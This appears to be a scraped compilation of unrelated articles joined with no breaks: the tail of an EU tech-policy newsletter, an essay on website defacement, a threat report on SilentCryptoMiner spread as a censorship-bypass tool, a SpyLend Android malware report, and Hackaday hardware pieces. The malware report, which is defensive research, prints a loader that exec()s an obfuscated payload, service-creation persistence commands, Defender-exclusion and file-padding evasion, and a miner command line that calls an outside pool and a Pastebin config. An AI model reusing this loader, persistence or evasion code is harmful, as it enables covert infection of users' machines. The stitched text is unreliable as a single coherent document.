To a degree, this makes sense. The EU's economy remains sluggish, and Brussels can't realistically compete with Beijing and Washington on the global stage if it doesn't have a homegrown tech industry. That goes for everything from AI startups to industrial champions making electric vehicles. All the best (or worst?) digital rules in the world don't matter if non-EU countries look at how that legislation hasn't helped local businesses, and say 'no thanks.' Caveat: such legislation is also about protecting citizens from harm, but I digress.
This change of focus — where even returning EU officials who helped to craft these rules in the previous European Commission's tenure are shifting their policymaking approach — will inevitably have an impact on how digital rules are created.
Already, Brussels has shelved its so-called AI Liability Directive over concerns it would harm growth. I have questions about how future investigations, under the Digital Services Act and Digital Markets Act, will be pushed if such probes signal to all countries (both EU and non-EU) that the bloc isn't open for business. The AI Act's full implementation is still about 18 months away, and I equally question what resources will be provided to make sure those rules are effective given the change in political priorities at the top of the European Commission.
Much of this nuance is getting lost in the EU-US diplomatic spat over Washington's aversion to Brussels' regulatory rulebook. European fears over American retaliatory tariffs are certainly worrying many within the EU — both inside the so-called Brussels Bubble and across national capitals.
But it's the 180-degree internally-focused turn within the 27-country bloc that's driving the wider change in the EU's mood music around digital regulation.
No, the existing rules aren't going away — and will lead to likely enforcement actions against (some) American firms, given the ongoing probes into Meta, Alphabet and X, among others. Yet the era of 'let them have more digital rules!' is over within the EU. And that shift is coming from within, not from outside.
What I'm reading
— The geopolitical race on AI is fundamentally reshaping international data flows and leading to regulatory fragmentation, argue Christopher Kuner and Gabriela Zanfir-Fortuna for the Future of Privacy Forum.
— Japan approved new AI legislation that represents a so-called 'light touch' approach to the technology, and will require companies to voluntarily cooperate with Tokyo's safety measures. More here and here.
— The European Union and India held their second Trade and Technology Council meeting in New Delhi on Feb 28. Here are the outcomes.
— OpenAI updated its analysis on how malign actors were using its technology for 'malicious uses.' More here.
— The European Fact-Checking Standards Network condemned a recent police raid on its Serbian member organization Istinomer.rs. More here.
Discovering Defacements: Cyber Hacktivism, Psy-Ops and Cyber Warfare
In recent years, the phenomenon of website defacement has evolved significantly. Once primarily a form of digital protest by hacktivist groups, it is now increasingly intertwined with psychological warfare, cyber warfare and disinformation operations.
Defacement consists of the unauthorized modification of a web page, often to convey political, ideological or propaganda messages. But what are the dynamics behind these attacks?
And what implications do they have in the current geopolitical context?
Defacement: a weapon of hacktivism
Hacktivism (a portmanteau of "hacking" and "activism") has used defacement as a protest tool since the 1990s. Groups such as Anonymous and LulzSec have frequently attacked government and corporate sites to denounce corruption, censorship and human rights violations. This type of attack has the advantage of being visible and having a strong media impact, without necessarily causing permanent damage to IT systems.
A historical example is the 2013 NASA defacement, when hacktivists modified official pages of the US space agency's website. However, deface-based hacktivism is often criticized for its long-term ineffectiveness: while it can draw attention to certain causes, it rarely leads to concrete change.
The 2013 NASA defacement by the Master Italian Hackers Team, which investigations later traced to an Italian hacker.
Russia's invasion of Ukraine has seen an unprecedented escalation in hacktivist activity, with numerous groups siding with one of the two factions. On one side, pro-Russia groups such as Killnet and NoName057(16) have conducted large-scale DDoS attacks against critical infrastructure and Western government sites, seeking to destabilize their adversaries' networks. On the other, pro-Ukraine actors, including some affiliated with Anonymous, have responded with targeted attacks on Russian sites, often using defacement to spread anti-Kremlin messages and undermine Moscow's propaganda.
Anonymous Italia, in particular, has carried out numerous defacements of Russian sites, broadcasting its support for Western values and for Ukraine. In this context, defacement has proven to be a psychological warfare tool, capable of shaping public perception and international opinion.
From protest to cyber war: when defacement becomes strategic
Where defacements were once mostly symbolic acts, today they increasingly fit into cyber warfare strategies. States and groups of cyber mercenaries (or cyber militias) use defacement not only for propaganda, but also to spread disinformation and destabilize adversaries.
A textbook case is that of the pro-Russian and pro-Ukrainian groups that, since 2022, have waged defacement campaigns against government sites, banks and media outlets. The goal is not only to demonstrate technical superiority, but also to undermine trust in the targeted institutions and spread narratives favorable to their own side.
This transition from hacktivism to psyops and cyber war shows how cyberspace has become a new battlefield, where information is a weapon as powerful as the most sophisticated malware.
#OpSaveGaza: the July 2014 operation by Anonymous_Arabe linked to tensions over the Gaza Strip
Techniques and tools used in defacements
Defacement can be carried out through various techniques, depending on the vulnerabilities the attackers exploit. The most common methods include:
- SQL injection: grants access to a website's databases and allows its contents to be modified.
- Exploitation of vulnerable CMSes: many platforms, such as WordPress and Joomla, are targeted when left unpatched.
- Credential stuffing: using stolen credentials, attackers can access the site's management systems.
- Remote code execution: exploiting security bugs and known CVEs or 0-days to gain malicious access to the system and make structural changes to its pages.
To counter these attacks, organizations must implement good security practices, such as regular updates, WAF (Web Application Firewall) protection and active threat monitoring.
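As an illustration of the first item on that list: the standard defense against SQL injection is parameterized queries, which keep user input as data rather than folding it into the SQL text. A minimal sketch using Python's built-in sqlite3 module; the table, column names and data are hypothetical:

```python
import sqlite3

# Hypothetical CMS-style table of pages.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pages (slug TEXT, body TEXT)")
conn.execute("INSERT INTO pages VALUES ('home', 'Welcome')")

def get_page(slug):
    # The ? placeholder binds the input as a value, never as SQL text,
    # so a payload like "' OR '1'='1" cannot rewrite the query.
    row = conn.execute("SELECT body FROM pages WHERE slug = ?", (slug,)).fetchone()
    return row[0] if row else None

print(get_page("home"))           # Welcome
print(get_page("' OR '1'='1"))    # None: the injection attempt matches nothing
```

Had the query been built by string concatenation instead, the same payload would have returned every row, which is exactly the kind of foothold a defacer needs to modify content.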
The future of defacements: new threats and defensive measures
In a hybrid-warfare context, where cyber operations are combined with conventional military action, defacement could increasingly become a psychological warfare (psyops) tool. One example is the possibility of altering news sites to spread credible fake news and manipulate public opinion.
Psychological warfare operations in cyberspace are not limited to defacing; they include a range of tactics such as social media manipulation, propaganda spread through botnets, and the creation of deepfakes to discredit public figures or influence geopolitical events.
Hacktivism, often considered separate from cyber war, can overlap with psyops when collectives such as Anonymous use DDoS attacks, document leaks and digital sabotage to influence public perception and the political narrative. In conflict scenarios, nation-states may even use hacktivist groups as proxies to conduct disinformation operations without exposing themselves directly.
A historical example is the use of cyber psyops in the Russia-Ukraine conflict, where state and non-state actors have altered websites, spread false news and exploited social media to destabilize the enemy. This shows how information warfare and influence operations can have a strategic impact, affecting not only public opinion but also military and political decisions.
Defacement used by law enforcement too
Law enforcement agencies have begun using defacing as a way to demonstrate the compromise of criminal groups' IT infrastructure, showcasing their ability to infiltrate malicious actors' networks. A significant example of this approach is Operation Cronos, an international action against the LockBit ransomware group. During this operation, the authorities took control of the systems LockBit used to publish data from breached companies and defaced some of its websites. They also used the countdown technique (typical of ransomware cybergangs) to release previously unseen information about LockBit and its affiliates.
LockBit's data leak site "defaced" by law enforcement during Operation Cronos. (Source: RedHotCyber)
Another notable example was the law enforcement action against the well-known dark web marketplace Genesis Market, a site used to sell stolen credentials and personal data. After dismantling the market, the authorities replaced the website with a page announcing the arrests and the platform's takedown.
This operation not only disrupted illegal activity on the clear web, but also served as a visible demonstration of the effectiveness of cyber investigations and operations in dismantling criminal networks. Defacing, in this case, was a tool for publicly demonstrating law enforcement's success in the fight against cybercrime.
The Genesis Market defacement; Italy's Polizia Postale also took part in the takedown. (Source: RedHotCyber)
The use of such tactics by law enforcement highlights the growing role of sanctioned hacking operations in countering and dismantling criminal infrastructure, an approach likely to become increasingly common in operations against cybercrime.
Conclusion
Defacement, born as a simple form of digital protest, has evolved into a sophisticated tool for conducting psyops, cyber warfare and information manipulation. While genuine hacktivists continue to use it to denounce injustice, state actors, operating behind a double mask, enlist groups of mercenary cybercriminals and integrate such operations into cyber war strategies.
Understanding the dynamics behind these attacks is essential both to defend against them and to anticipate the moves of those who exploit cyberspace for political and strategic ends.
The battle for digital security has only just begun; the roles of defacement and DDoS are changing, and this scenario will continue to evolve.
The article Alla Scoperta dei Deface: tra Hacktivismo Cibernetico, Psy-Ops e Cyber Warfare originally appeared on il blog della sicurezza informatica.
Undercover miner: how YouTubers get pressed into distributing SilentCryptoMiner as a restriction bypass tool
In recent months, we’ve seen an increase in the use of Windows Packet Divert drivers to intercept and modify network traffic in Windows systems. This technology is used in various utilities, including ones for bypassing blocks and restrictions of access to resources worldwide. Over the past six months, our systems have logged more than 2.4 million detections of such drivers on user devices.
Dynamics of Windows Packet Divert detections
The growing popularity of tools using Windows Packet Divert has attracted cybercriminals. They started distributing malware under the guise of restriction bypass programs and injecting malicious code into existing programs.
Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives. This plays into the hands of attackers by allowing them to persist in an unprotected system without the risk of detection. Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency. The most commonly used malware families were NJRat, XWorm, Phemedrone and DCRat.
Blackmail as a new infection scheme
We recently uncovered a mass malware campaign infecting users with a miner disguised as a tool for bypassing blocks based on deep packet inspection (DPI). The original version of the tool is published on GitHub, where it has been starred more than 10,000 times. There is also a separate project based on it that is used to access Discord and YouTube.
According to our telemetry, the malware campaign has affected more than 2,000 victims in Russia, but the overall figure could be much higher. One of the infection channels was a YouTuber with 60,000 subscribers, who posted several videos with instructions for bypassing blocks, adding a link to a malicious archive in the description. These videos have reached more than 400,000 views. The description was later edited and the link replaced with the message “program does not work”.
The link pointed to the malicious site gitrok[.]com, which hosted the infected archive. At the time the video was posted, the download counter showed more than 40,000 downloads.
Later, in discussions in the tool’s original repository, we found messages about a new distribution scheme: attackers, posing as the tool’s developers, filed strikes against the videos with instructions for bypassing restrictions. They then threatened the content creators, under the pretext of copyright infringement, demanding that they post videos with malicious links or risk the shutdown of their YouTube channels.
Translation:
Hi, I have a question about YouTube strikes on the use of open-source code from the repository [REDACTED].
I created a tutorial video using materials from this repository, since it was publicly available on GitHub, and the video was non-commercial. But I still got hit with a YouTube strike for demonstrating the code.
I’d like to know whether it’s the authors themselves or someone acting on their behalf who sends the strikes? Or is it just a misunderstanding?
This way, the scammers were able to manipulate the reputation of popular YouTubers to force them to post links to infected files.
Example of a fraudulent message asking a YouTuber to post a link to a malicious site
Translation:
Official website: gitrok.com
All traffic should now be directed strictly to this site. GitHub remains solely a repository for developers.
If you have social networks where you’ve advertised [REDACTED], please publish a new post with a mention of our official website, and note that you can now download [REDACTED] only from there.
YouTuber complaints about cybercriminal activity
Translation:
Dear program developer @[REDACTED] YouTubers who showed how the program works and helped people unblock YouTube in Russia are having problems with scammers handing out strikes and threatening to delete these creators’ channels. They force you to shoot 2 more videos for your channel so that if anything happens they can send 2 more strikes, then it’s 3 strikes and you’re out – Google will delete the channel. YouTubers feel pressured to give in to the scammers’ demands to save their channels. But that only makes things worse.
SCAMMERS FORCE YOUTUBERS TO SHOOT VIDEOS OF THEIR PROGRAM, THAT’S WHY I DON’T HAVE A SINGLE YOUTUBE VIDEO OF THIS PROGRAM…
In addition, we found a Telegram channel actively distributing the malicious build and a video tutorial on a YouTube channel with 340,000 subscribers.
And in December 2024, users reported the distribution of a miner-infected version of the same tool through other Telegram and YouTube channels, which have since been shut down.
Infected archive
All the discovered infected archives contained one additional executable file, while the original start script general.bat had been modified to run this file using PowerShell. In one version, if the security solution on the victim’s device deleted the malicious file, the modified start script displayed the message “File not found, disable all antiviruses and re-download the file, that will help!” to persuade the victim to run the malicious file, bypassing protection:
Contents of the original (left) and modified (right) general.bat start script
The malicious executable is a simple loader written in Python and packed into an executable application using PyInstaller. In some cases, the script has been additionally obfuscated using the PyArmor library.
import os
import subprocess
import sys
import ctypes
import base64
import tempfile
import urllib.request as urllib
import datetime
import time
import psutil
import base64
import binascii
cmb8F2SLqf1 = '595663786432497a536a424...335331453950513d3d'  # hex-encoded blob (truncated)
decoded_hex = bytes.fromhex(cmb8F2SLqf1).decode()  # hex -> Base64 string
step1 = base64.b64decode(decoded_hex).decode()     # first Base64 layer
exec(base64.b64decode(step1).decode())             # second Base64 layer, then execute
Example of the unpacked loader
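The layered wrapping is straightforward to undo statically. Below is a minimal sketch (the helper names are ours, not from the sample) that mirrors the loader’s hex-then-double-Base64 scheme and returns the hidden source instead of exec()-ing it:

```python
import base64

def encode_like_loader(src: str) -> str:
    # Mirror the loader's wrapping: Base64, Base64 again, then hex
    step1 = base64.b64encode(src.encode()).decode()
    step2 = base64.b64encode(step1.encode()).decode()
    return step2.encode().hex()

def decode_like_loader(blob: str) -> str:
    # The same three layers in reverse; return the source rather than exec() it
    decoded_hex = bytes.fromhex(blob).decode()
    step1 = base64.b64decode(decoded_hex).decode()
    return base64.b64decode(step1).decode()

sample = encode_like_loader("print('payload')")
assert decode_like_loader(sample) == "print('payload')"
```

An analyst can run the decode half against the real string from the sample to recover the next stage safely.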
The loader retrieves the URL of the next-stage payload from a hardcoded path on one of two domains: canvas[.]pet or swapme[.]fun. After the download, it saves the payload, named t.py, in a temporary directory and runs it.
Note that the payload can be downloaded only from Russian IP addresses, indicating that the malware campaign was aimed at users in Russia.
Second-stage malware loader
The next stage of the infection chain was a custom Python loader based on open-source code snippets. Below are the execution steps for this script:
- Scanning the current environment for artifacts of running on a virtual machine or in a sandbox. The loader compares system data (computer and user names, MAC addresses, unique disk identifiers (HWID), GPU parameters, etc.) with predefined lists of values used by virtual environments.
- Adding the AppData directory to Microsoft Defender exclusions.
- GET request to 193.233.203[.]138/WjEjoHCj/t. Depending on the response (true/false) and the specified probability, the script either downloads the executable file from the server at http://9x9o[.]com/q.txt, or uses a hardcoded block of data in Base64 format. The resulting file is saved at %LocalAppData%\driverpatch9t1ohxw8\di.exe.
- Modifying the payload. The executable file just written to disk is modified by appending random blocks of data to the end until it reaches 690 MB in size. This technique is used to hinder automatic analysis by antivirus solutions and sandboxes.
- Gaining persistence in the system. The loader creates a service named DrvSvc and sets its description to that of the legitimate Windows Image Acquisition (WIA) service:
svc_name = "DrvSvc"
svc_desc = "Launches applications associated with still image acquisition events."
cmd_create = f'sc create {svc_name} binPath= "{exe_path}" start= auto'
cmd_desc = f'sc description {svc_name} "{svc_desc}"'
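The file-pumping step described above is easy to reproduce at a benign scale. This sketch shows the technique itself, with a tiny target size standing in for the loader’s 690 MB:

```python
import os
import random
import tempfile

def pad_file(path: str, target_size: int, block: int = 4096) -> None:
    # Append random blocks until the file reaches at least target_size bytes;
    # the junk inflates the file past what many scanners will process
    with open(path, "ab") as f:
        while os.path.getsize(path) < target_size:
            f.write(random.randbytes(block))

# Demo with a tiny target instead of the loader's 690 MB
demo = tempfile.NamedTemporaryFile(delete=False, suffix=".bin")
demo.write(b"MZ")  # stand-in for a real executable header
demo.close()
pad_file(demo.name, 64 * 1024)
```

The random data also defeats naive hash-based deduplication, since every padded copy differs.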
SilentCryptoMiner
The downloaded di.exe is a SilentCryptoMiner sample based on the open-source miner XMRig. This is a covert miner able to mine multiple cryptocurrencies (ETH, ETC, XMR, RTM and others) using various algorithms. For stealth, SilentCryptoMiner employs process hollowing to inject the miner code into a system process (in this case, dwm.exe). The malware is able to stop mining while the processes specified in the configuration are active. It can be controlled remotely via a web panel. The miner is coded to scan for indicators of running in a virtual environment and check the size of the executable itself, which must be at least 680 MB and no more than 800 MB – this is how the attackers make sure that the miner was run by the above-described loader.
The miner configuration is Base64-encoded and encrypted using the AES-CBC algorithm with the key UXUUXUUXUUCommandULineUUXUUXUUXU and the initialization vector UUCommandULineUU. It has many parameters, including: the algorithm and URL for mining; a list of programs which upon execution cause the miner to temporarily stop and free its resources; a link to the remote configuration that the miner will re-fetch every 100 minutes:
--algo=rx/0 --url=150.241.93[.]90:443 --user="JAN2024" --pass="JAN2024" --cpu-max-threads-hint=20 --cinit-remote-config="https://pastebin.com/raw/kDDLXFac" --cinit-stealth-targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --cinit-version="3.2.0" --tls --cinit-idle-wait=4 --cinit-idle-cpu=30 --cinit-id="uvduaauhlrqdhmpj"
The campaign makes use of the Pastebin service to store configuration files. We detected several accounts distributing such files.
Takeaways
The topic of restriction bypass tools is being actively exploited to distribute malware. The above campaign limited itself to distributing a miner, but threat actors could start to use this vector for more complex attacks, including data theft and downloading other malware. This underscores once again that, while such tools may look enticing, they pose a serious threat to user data security.
Indicators of compromise
Infected archives
574ed9859fcdcc060e912cb2a8d1142c
91b7cfd1f9f08c24e17d730233b80d5f
PyInstaller loaders
9808b8430667f896bcc0cb132057a683
0c380d648c0c4b65ff66269e331a0f00
Malicious Python scripts
1f52ec40d3120014bb9c6858e3ba907f
a14794984c8f8ab03b21890ecd7b89cb
SilentCryptoMiner
a2a9eeb3113a3e6958836e8226a8f78f
5c5c617b53f388176173768ae19952e8
ac5cb1c0be04e68c7aee9a4348b37195
Malicious domains and IPs
hxxp://gitrok[.]com
hxxp://swapme[.]fun
hxxp://canvas[.]pet
hxxp://9x9o[.]com
193.233.203[.]138
150.241.93[.]90
Speaking Computers from the 1970s
Talking computers are nothing these days. But in the old days, a computer that could speak was quite the novelty. Many computers from the 1970s and 1980s used an AY-3-8910 chip and [InazumaDenki] has been playing with one of these venerable chips. You can see (and hear) the results in the video below.
The chip uses PCM, and there are different ways to store and play sounds. The video shows how different they are and even looks at the output on the oscilloscope. The chip has three voices and was produced by General Instruments, the company that initially made PIC microcontrollers. It found its way into many classic arcade games, game consoles like the Intellivision and Vectrex, and home computers such as the MSX and ZX Spectrum. Sound cards for the TRS-80 Color Computer and the Apple II also used these chips. The Atari ST used a variant from Yamaha, the YM2149F.
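For those wanting to experiment, the chip’s tone generators are simple to drive: each channel divides the input clock by 16 times a 12-bit period value. A quick sketch of the register math, assuming a 2 MHz clock (actual clocks varied by machine):

```python
def ay_tone_period(freq_hz: float, clock_hz: int = 2_000_000) -> int:
    # The AY-3-8910 divides its clock by 16 * TP, where TP is a
    # 12-bit tone period: f = clock / (16 * TP)
    tp = round(clock_hz / (16 * freq_hz))
    return max(1, min(tp, 0xFFF))  # clamp to the 12-bit register range

def split_registers(tp: int) -> tuple[int, int]:
    # Channel A stores TP across two registers: coarse (4 bits) and fine (8 bits)
    return tp >> 8, tp & 0xFF

tp = ay_tone_period(440)  # concert A
```

With a 2 MHz clock, 440 Hz works out to a period of 284, split as coarse 1 and fine 28.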
There’s some code for an ATmega, and the video says it is part one, so we expect to see more videos on this chip soon.
General Instruments had other speech chips and some of them are still around in emulated form. In fact, you can emulate the AY-3-8910 with little more than a Raspberry Pi Pico.
youtube.com/embed/EJkdTjGpREg?…
Beware of SpyLend: The Android Malware with 100,000 Downloads on Google Play!
Cyfirma analysts have discovered that an Android malware called SpyLend infiltrated the official Google Play store and was downloaded more than 100,000 times. The malware was disguised as a financial tool and was used in India to issue loans as part of the SpyLoan scheme.
SpyLoan-type malware usually masquerades as legitimate financial tools or credit services that offer users loans with fast approval, but the terms of those loans are often highly misleading or simply false. The apps also steal data from victims’ devices for later use in blackmail.
In addition, SpyLoan apps always request excessive privileges on the device, including permission to use the camera (supposedly to upload KYC photos) and access to the calendar, contacts, SMS messages, location, sensor data, and so on. As a result, the operators of these applications can steal confidential data from the device and use it for blackmail, ultimately forcing the victim to pay.
Cyfirma researchers found an app in the official store called Finance Simplified, downloaded over 100,000 times, which presented itself as a financial management tool.
According to the researchers, in certain countries such as India the application exhibits malicious behavior and steals data from users’ devices. Other malicious APKs that appear to be variants of the same malware campaign were also discovered: KreditApple, PokketMe, and StashFur.
Although the app has already been removed from Google Play, it may continue to run in the background, collecting sensitive information from infected devices, including:
- contacts, call logs, SMS messages, and device data;
- photos, videos, and documents from internal and external storage;
- the victim’s real-time location (updated every 3 seconds), location history, and IP address;
- the last 20 text entries copied to the clipboard;
- credit history and SMS messages about banking transactions.
Numerous user reviews of Finance Simplified on Google Play indicate that the app offered loan services, and its operators then tried to extort money from borrowers who refused to pay high interest rates.
Although the data listed above was used primarily to extort money from people who took the risk of borrowing through Finance Simplified, it could also be used for financial fraud or resold to cybercriminals.
To avoid detection on Google Play, Finance Simplified used a WebView to redirect users to an external site, from which they downloaded the loan APK hosted on Amazon EC2. Notably, the application only downloaded the additional APK if the user was located in India.
The article “Attenti a SpyLend: Il Malware Android con 100.000 Download su Google Play!” originally appeared on il blog della sicurezza informatica.
Build a Parametric Speaker of Your Own
The loudspeaker on your home entertainment equipment is designed to project audio around the space in which it operates; even if it isn’t omnidirectional as such, it can feel that way as the surroundings reflect the sound to you wherever you are. Making a directional speaker that projects sound over a long distance is considerably more difficult than making one similar to your home speaker, and [Orange_Murker] is here with a solution. At the recent Hacker Hotel conference in the Netherlands, she presented an ultrasonic parametric speaker. It projects an extremely narrow beam of sound over a significant distance, yet it’s not an audio frequency speaker at all.
Those of you familiar with radio will recognize its operation; an ultrasonic carrier is modulated with the audio to be projected, and the speaker transfers that to the air. Just like the diode detector in an old AM radio, air is a nonlinear medium, and it performs a demodulation of the ultrasound to produce an audio frequency that can be heard. She spends a while going into modulation schemes, before revealing that she drove her speaker with a 40 kHz PWM via an H bridge. The speaker itself is an array of in-phase ultrasonic transducers, and she demonstrates the result on her audience.
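If you want to play with the idea in software first, here’s a rough sketch of plain amplitude modulation onto a 40 kHz carrier (simpler than the PWM drive [Orange_Murker] actually used):

```python
import math

FS = 400_000        # simulation sample rate, 10x the carrier
CARRIER = 40_000    # ultrasonic carrier frequency in Hz

def am_modulate(audio, depth=0.8):
    # Plain DSB-AM: the carrier's amplitude follows (1 + depth * audio);
    # the air's nonlinearity recovers this envelope as audible sound
    return [(1 + depth * a) * math.sin(2 * math.pi * CARRIER * n / FS)
            for n, a in enumerate(audio)]

# 1 ms of a 1 kHz test tone
tone = [math.sin(2 * math.pi * 1_000 * n / FS) for n in range(FS // 1_000)]
tx = am_modulate(tone)
```

In hardware, the equivalent is varying the drive to the transducer array at the audio rate, which is exactly what her H-bridge PWM scheme approximates.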
This project is surprisingly simple, should you wish to have a go yourself. There’s a video below the break, and she’s put all the files in a GitHub repository. Meanwhile this isn’t the first time we’ve seen a project like this.
media.ccc.de/v/2025-201-build-…
Smartwatches Could Flatten the Curve of the Next Pandemic
While we’d like to think that pandemics and lockdowns are behind us, the reality is that a warming climate and the fast-paced travel of modern life are a perfect storm for nasty viruses. One thing that could help us curb the spread of the next pandemic may already be on your wrist.
Researchers at Aalto University, Stanford University, and Texas A&M have found that the illness detection features common to modern smartwatches are advanced enough to help people make the call to stay home or mask up and avoid getting others sick. They note we’re already at 88% accuracy for early detection of COVID-19 and 90% for the flu. Combining data from a number of other studies on smartwatch accuracy, epidemiology, behavior, and biology, the researchers were able to model the possible outcomes of this early detection on the spread of future diseases.
“Even just a 66-75 percent reduction in social contacts soon after detection by smartwatches — keeping in mind that that’s on a par with what you’d normally do if you had cold symptoms — can lead to a 40-65 percent decrease in disease transmission compared to someone isolating from the onset of symptoms,” says Märt Vesinurm.
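The researchers’ models are far more detailed, but the intuition can be sketched with a toy SIR simulation in which a smartwatch alert prompts an early cut in contacts:

```python
def final_attack_rate(r0: float, contact_reduction: float = 0.0,
                      pop: int = 100_000, i0: int = 10, days: int = 365,
                      infectious_days: float = 5.0) -> float:
    # Discrete-time SIR; contact_reduction scales transmission,
    # standing in for early isolation after a smartwatch alert
    beta = (r0 / infectious_days) * (1.0 - contact_reduction)
    gamma = 1.0 / infectious_days
    s, i, r = float(pop - i0), float(i0), 0.0
    for _ in range(days):
        new_inf = beta * s * i / pop
        new_rec = gamma * i
        s, i, r = s - new_inf, i + new_inf - new_rec, r + new_rec
    return r / pop  # fraction of the population ever infected

baseline = final_attack_rate(2.0)
early_isolation = final_attack_rate(2.0, contact_reduction=0.7)
```

Even this crude model shows the qualitative effect: cutting contacts by 70% after detection collapses the epidemic’s final size.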
We’ve got you covered if you’re looking for a smartwatch that looks a bit like a hospital wristband and we’ve also covered one that’s alive. That way, you’ll have a slimy friend when you’re avoiding other humans this time around. And when it’s time to develop a vaccine for whatever new bug is after us, how do mRNA vaccines work anyway?
Shortwave Resurrection: A Sticky Switch Fix on a Hallicrafters
Shortwave radio has a charm all its own: part history, part mystery, and a whole lot of tech nostalgia. The Hallicrafters S-53A is a prime example of mid-century engineering, but when you get your hands on one, chances are it won’t be in mint condition. Which was exactly the case for this restoration project by [Ken’s Lab], where the biggest challenge wasn’t fried capacitors or burned-out tubes, but a stubborn band selector switch that refused to budge.
How did it come to this? Time, oxidation, and old-school metal tolerances. Instead of forcing it (and risking a very bad day), [Ken]’s repair involved careful disassembly, a strategic application of lubricant, and a bit of patience. As the switch started to free up, another pleasant surprise emerged: all the tubes were original Hallicrafters stock. A rare find, and a solid reason to get this radio working without unnecessary modifications. Because some day, owning a shortwave radio could be a good decision.
Once powered up, the receiver sprang to life, picking up shortwave stations loud and clear. Hallicrafters’ legendary durability proved itself once before, in this fix that we covered last year. It’s a reminder that sometimes, the best repairs aren’t about drastic changes, but small, well-placed fixes.
What golden oldie did you manage to fix up?
youtube.com/embed/Nx8Mq9OCoRo?…
Interposer Helps GPS Receiver Overcome Its Age
We return to [Tom Verbeure] hacking on Symmetricom GPS receivers. This time, the problem’s more complicated, but the solution remains the same – hardware hacking. If you recall, the previous frontier was active antenna voltage compatibility – now, it’s rollover. See, the GPS receiver chip has its internal rollover date set to 18 September 2022. We passed that date a while back, but the receiver’s firmware isn’t new enough to know how to handle this. What to do? Build an interposer, of course.
You can bring the receiver back into operation by sending some extra init commands to the GPS chipset during bootup, and firmware hacking just wasn’t a viable route. An RP2040 board, a custom PCB, a few semi-bespoke connectors, and a few zero-ohm resistors were all it took to make this work. From there, a MITM firmware wakes up, sends the extra commands during power-on, and passes all the other traffic right through – the system suspects nothing.
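The pass-through idea can be sketched in a few lines; here, in-memory streams stand in for the two UARTs, and the init command shown is purely hypothetical, not the actual Symmetricom sequence:

```python
import io

# Hypothetical init command; the real commands live in [Tom]'s firmware
EXTRA_INIT = [b"$PROPRIETARY,FIX_ROLLOVER*00\r\n"]

def interpose(host_to_gps: io.BytesIO, gps_uart: io.BytesIO) -> None:
    # On power-up, inject the extra init commands first...
    for cmd in EXTRA_INIT:
        gps_uart.write(cmd)
    # ...then pass the host's normal traffic through untouched
    gps_uart.write(host_to_gps.read())

host = io.BytesIO(b"$NORMAL,TRAFFIC*11\r\n")
gps = io.BytesIO()
interpose(host, gps)
```

On the real board, the same logic runs continuously on the RP2040, shuttling bytes between two hardware UARTs after the one-time injection.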
Everything is open-source, as we could expect. The problem’s been solved, and, as a bonus, this implant gives a workaround path for any future bugs we might encounter as far as GPS chipset-to-receiver comms are concerned. Now, the revived S200 serves [Tom] in his hacking journeys, and we’re reminded that interposers remain a viable way to work around firmware bugs. Also, if the firmware (or the CPU) is way too old to work with, an interposer is a great first step to removing it from the equation completely.
Inexpensive Powder Coating
[Pete] had a friend who would powder coat metal parts for him, but when he needed 16 metal parts coated, he decided he needed to develop a way to do it himself. Some research turned up the fluid bed method and he decided to go that route. He 3D printed a holder and you can see how it all turned out in the video below.
A coffee filter holds the powder in place. The powder is “fluidized” by airflow, which, in this case, comes from an aquarium pump. The first few designs didn’t work out well. Eventually, though, he had a successful fluid bed. You preheat the part so the powder will stick and then, as usual, bake the part in an oven to cure the powder. You can expect to spend some time getting everything just right. [Pete] had to divert airflow and adjust the flow rate to get everything to work right.
With conventional powder coating, you usually charge the piece you want to coat, but that’s not necessary here. You could try a few other things as suggested in the video comments: some suggested ditching the coffee filter, while others think agitating the powder would make a difference. Let us know what you find out.
This seems neater than the powder coating guns we’ve seen. Of course, these wheels had a great shape for powder coating, but sometimes it is more challenging.
youtube.com/embed/Kh5TEMo2bdc?…
Keebin’ with Kristina: the One with the Schreibmaschine
Image by [Sasha K.] via reddit
Remember that lovely Hacktric centerfold from a couple Keebins ago with the Selectric keycaps? Yeah you do. Well, so does [Sasha K.], who saw the original reddit post and got inspired. [Sasha K.] has more than one IBM Selectric lying around, which is a nice problem to have, and decided to strip one of its keycaps and get to experimenting.
The result is a nice adapter that allows them to be used with Kailh chocs — you can find the file on Thingiverse, and check out the video after the break to see how they sound on a set of clicky white chocs.
Those white chocs are attached to a ThumbsUp! v8 keyboard, a line that [Sasha K.] designed. His daily driver boards are on v9 and v10, but the caps were getting jammed up because of the spacing on those. So instead, he used v8 which has Cherry MX spacing but also supports chocs.
As you can see, there is not much to the adapter, which essentially plugs the Selectric keycap’s slot and splits the force into the electrical outlet-style pair of holes that chocs bear. This feels like an easier problem to solve than making an adapter for MX-style switches. What do you think?
youtube.com/embed/5UlwyUif-mc?…
Desk-Mounted Macro Pad Does Not Control Desk Height
Image by [CloffWrangler] via reddit
But it sure is a nice-looking first design, isn’t it? Especially with that colorway and the ISO Return. Mmm. Reminds me of the Data General Dasher, and for good reason — those are Drop’s Dasher key caps.
So why the number scheme? It doesn’t mean anything; it’s simply representative of the keycaps that [CloffWrangler] had lying around. They are currently used for volume control, toggling the mic and webcam in Zoom, and some other stuff that [CloffWrangler] hasn’t landed on just yet.
This hand-wired, 3D-printed beauty is ruled by a Raspberry Pi Pico and contains Gateron Oil Kings switches. I sure would like to have something similar, but I think I would hit it with my chair quite a bit unless I put it way over there to the right or something. But then I wonder, would it be as useful? If it were at arm’s length, I might be tempted to rotate the thing 90° to the right so it wouldn’t be awkward to use.
The Centerfold: A Cat Person Lives Here
Image by [moobel] via reddit
Don’t these friendly keycaps look nice and soft? Apparently they’re not, according to [moobel]. That’s unfortunate. But they do feel nice to type on nonetheless.
So, that’s not too many keys, is it? That’s because this isn’t technically a keyboard. It’s a pair of Taipo keyboards, which are meant to be used for chording with either one or both hands. I really appreciate that [moobel] discovered the Taipo and decided to make a pair in order to learn the layout.
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: Der Kanzler
Image by [DonaldDutchie] via reddit
How quickly can you type on a typewriter? To a certain extent, it depends on the machine. Der Kanzler Schreibmaschine was a fine piece of German engineering that allowed one to type quickly for an interesting reason: it could print 88 characters using only 11 type bars with 8 characters each.
